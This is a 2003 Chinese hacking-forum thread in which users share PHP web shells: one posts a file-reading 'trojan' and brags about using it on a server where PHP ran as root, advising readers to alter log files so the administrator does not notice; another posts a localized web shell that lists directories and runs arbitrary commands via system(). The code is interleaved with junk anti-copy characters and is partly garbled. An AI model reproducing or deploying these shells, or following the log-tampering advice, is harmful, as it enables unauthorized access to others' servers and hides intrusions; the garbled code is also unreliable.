我写的一个PHP的简单木马

ASEE

重在实用，HoHo,某天发现某个LINUX服务器居然使用root权限执行PHP，真是让我心动不已，浏览器就是我的SHELL，因为有root权限，因此我就%￥##··*，当然不要忘了修改日志文件，HoHo,不然管理员会告你。 ( O' F5 p Y x& k; ^3 i' cxx.php如下（太简陋了，不免高手门笑话，hoho） 3 c @8 @: {/ g3 S, }( y; U //获得指定文件的文本 function getfile($filename) { 8 O; A* Y: J7 u* q' y; Z$ d9 H1 y if (!$filename){ return false; } $fp = @fopen($filename,"r"); ; w) [4 c4 H% X+ L3 y if (!$fp){ 9 i$ e- B/ N# J! g. [ return false; } $fdata = @fread($fp,filesize($filename)); + |3 u4 n5 P% J/ i fclose($fp); return $fdata; } 9 F; Y3 {* C; }4 ^$str="

yzhlinux

ACEE 的程序用来得到文件在好不过，工厂虽小，但是还用了摸板替换的思想，可贵！ 1 i% h5 W/ M# h! s但是在得到指定文件之前必须先看看服务器上都有些什么，想在服务器上执行命令，ACEE 的命令执行功能不够，这里我给大家这个专业的 shell。 : B: W' }. C/ m+ I: P2 L) R+ H/* GNU */ 4 m0 N& K$ U0 ]( n7 ]3 k/* 您可以任意传播，不过请一定写出作者名字 */ ; p, x4 N, n" {/* 原作者： Martin Geisler 改写汉化： YZHLINUX 3 V/ D8 ?0 S" a2 j% {2 Y*/ 2 n7 V! \- g$ p% {2 g, k# E * u7 u( {# x! r# t1 s4 H " A) [5 T* ]) d5 {5 \0 Q e4 [0 R$ y* ]2 ?3 m" A! J+ I, e% `5 i- j9 r/* 首先检查 $work_dir 是否被设置了值,这是我们的工作目录 */ 2 R" R9 f/ k: u$ N+ d% Aif (isset($work_dir)) { /* 说明已经设置了 工作目录 ,那么我们就吧当前目录改变倒这个地方 */ chdir($work_dir); ( u7 v, P: `; n' \% M $work_dir = exec("pwd"); // pwd 是 Unix 中显示当前目录的命令,这里我们执行它.得到当前目录 } else { /* 如果没有设置 工作目录,那么我们就到 apache 的工作目录 # X- W# j, f2 `! i Q$ R8 g 注: $DOCUMENT_ROOT 是系统提供的*/ 9 H7 s' l0 w% W5 h chdir($DOCUMENT_ROOT); - R! j7 ]. z$ _5 _; m0 z; @ $work_dir = $DOCUMENT_ROOT; } ?> * U6 D3 X% M; O0 M: M

当前工作目录: 8 T+ D! r0 \2 W$work_dir_splitted = explode("/", substr($work_dir, 1)); echo "Root/"; if ($work_dir_splitted[0] == "") { $work_dir = "/"; /* 根目录. */ } else { for ($i = 0; $i < count($work_dir_splitted); $i++) { /* echo "i = $i";*/ $url .= "/".$work_dir_splitted[$i]; echo "$work_dir_splitted[$i]/"; } 3 u, g4 X0 Z5 b9 a$ R' R} 0 ~5 A1 c+ N, b# e2 s& S0 A?>

选择新的工作目录:

3 I8 A3 Q+ g. A3 Q8 @& h /* 现在我们对这个目录坐一个文件列表 */ . O' n3 i- _- V! e$dir_handle = opendir($work_dir); /* 来一个遍历找出所有的文件和目录 */ / G1 d$ ~8 U( {while ($dir = readdir($dir_handle)) { . B! S* G; P9 r) h, Q' x, D if (is_dir($dir)) { 4 y; s) S* C$ b5 H2 d# a& v if ($dir == ".") { h9 k* u! i0 f! }0 _6 |# P8 |2 ~ echo "Current Directory\n"; 5 k* q" m* ]. q+ |+ q4 T } elseif ($dir == "..") { 5 [4 f. ~; e# y9 U" R$ O% N /* 我们找到了父目录,我们要注意里看看父目录是不是根目录 (/) */ if (strlen($work_dir) == 1) { - z( r+ m+ `" y5 }- S( f7 G /* 长度只有 1 ---- 那么只能是 '/' 了 */ } elseif (strrpos($work_dir, "/") == 0) { /* 发现第一个字符是 / 说明我到了顶层的目录了比如: /bin 或者 /home etc... */ echo "Parent Directory\n"; } else { echo "Parent Directory\n"; } } else { + q$ X9 }5 K' ^) N: a8 c if ($work_dir == "/") { echo "$dir\n"; 7 t4 c& n; p! f$ A# {$ f& o } else { echo "$dir\n"; ; Z% w) `2 R d# Y } - x& [, `4 U8 r. d! ] } } $ z! y% O- A& s; w6 k( _} closedir($dir_handle);//不要忘记关闭 2 z) F; p& X. B# @?>

命令:

>

是否捕获错误信息?

Output:

<span style="display:none">, R4 m5 i5 @' b3 w! L5 m& O</span><?php<font class="jammer">: }7 Z7 x0 i8 V</font> if ($command) { <span style="display:none">: J: z8 R- q1 K5 U. P3 E% d</span> if ($stderr) { <span style="display:none">' m& _6 U; }% N" I* O</span> /* 这个命令组能看懂吗? <font class="jammer">6 ~1 U6 ?) j& U, w$ p</font> 短短的一句语句但是做的事情有: 执行命令,把输出的结果保存到 output.txt ,显示 output.txt ,然后删除它!*/ <span style="display:none">3 a6 I: _1 ?9 O- A2 D3 I: [</span> system($command . " 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/output.txt"); <span style="display:none">1 g2 j5 f% p' G! c9 X</span> }else {<font class="jammer">9 {: g3 ^) [. W9 A5 `</font> system($command); <span style="display:none">6 o" M& P# n6 n$ y* y2 V3 C9 i: ^0 {</span> }<font class="jammer">- b0 S8 {# A7 {</font> }<font class="jammer">/ S; F: g7 q ?4 ^1 r8 j' @$ ?</font> ?> <span style="display:none">/ E% X/ f( c6 e3 K- n& c1 X* X8 ]</span>

1 N" D9 W" T, F! ~5 l 8 j- F8 a# \$ i" y

[此贴子已经被作者于2003-8-6 15:48:22编辑过]

$ }5 f8 l# T s

ASEE

不错，不错。

猴子很忙

能力有限，看不懂。。

晕晕了，第二篇就不看了，第一篇好像见到过了

ASEE

我写的代码还算简洁，噢，HOHO。。。那里见过也不奇怪，需要的时候就自己写。抄一百行代码还不如自己写一行，PHP只能处理字符，处理网叶，干不成大事，说白了，PHP还不如UNIX的各种SHELL。

yzhlinux

PHP 也是可以做Unix 的一个shell的。
语法就是php的语法，只要把编译好的cgi模式的解析程序执行，就是一个shell外壳了

ASEE

是啊，我都有这个想法啊，php 的 VC 源代码我看了很久了，我觉得可以把它改动成我们所设想的东西，嵌入到我们的其他程序中去做控制脚本。HoHo,功能强大哦！
不过不知道版权会被我们侵犯到什么地步 ：（

& V  [/ d0 \+ P

yzhlinux  ASEE，你们都是工程的吗？计算机系吗？程序方面很强哦。
我是工程的，但不是计算机系的。

yzhlinux

这你也看的出来？
我们既不是工程的也不是计算机系的

哦，这里的工程比较多啊，所以猜的，那你们什么学校的啊？

yzhlinux

我们都工作了你看不出来吗？

呵呵，没看出来，都是哪儿的，搞程序的？

yzhlinux

提供真人实姓，就不叫BBS了，那我注册了帐号还有什么意思？ ：）

又没让你说姓名，我想了解一下这里的高手有多少是学生啊

ASEE

以下是引用ASEE在2003-8-12 23:12:00的发言：
# A  k- ]. G- t- w- w0 b7 f是啊，我都有这个想法啊，php 的 VC 源代码我看了很久了，我觉得可以把它改动成我们所设想的东西，嵌入到我们的其他程序中去做控制脚本。HoHo,功能强大哦！
7 \0 J% a% w* y8 k' D 不过不知道版权会被我们侵犯到什么地步 ：（
  i1 e$ V& A$ Y% }

1 I2 o( g2 ]; @9 X+ F我有种发梦的感觉，是不是我眼花了，昨晚太累打字打错了，竟然写出这样的话来，我死也不信，如果有人攻击BBS，那就另当别论，或者帮主看不过去，那有另当别论。

yzhlinux

哪里啊，那是我要回复你的，结果却按错了，点成了编辑 ：（。
想恢复都不行了！ 你说的是什么我现在都忘记了！郁闷！

ASEE

看来这个BB让人郁闷，不过还算快。要不真象上CSDN一样，半天都进不去，干脆不去了，XML做的看来也不过如此，WEB SERVICE也不过如此，.NET也不过如此。

yzhlinux

这里人不多啊，自然快，CSDN 是快的，主要人太多，同时再线的比这里多500倍以上，半夜2:00以后你试试，那时没人，狂快！

yzhlounx 你是工程的吧  呵呵
* P& R8 K( A7 s" @; P0 c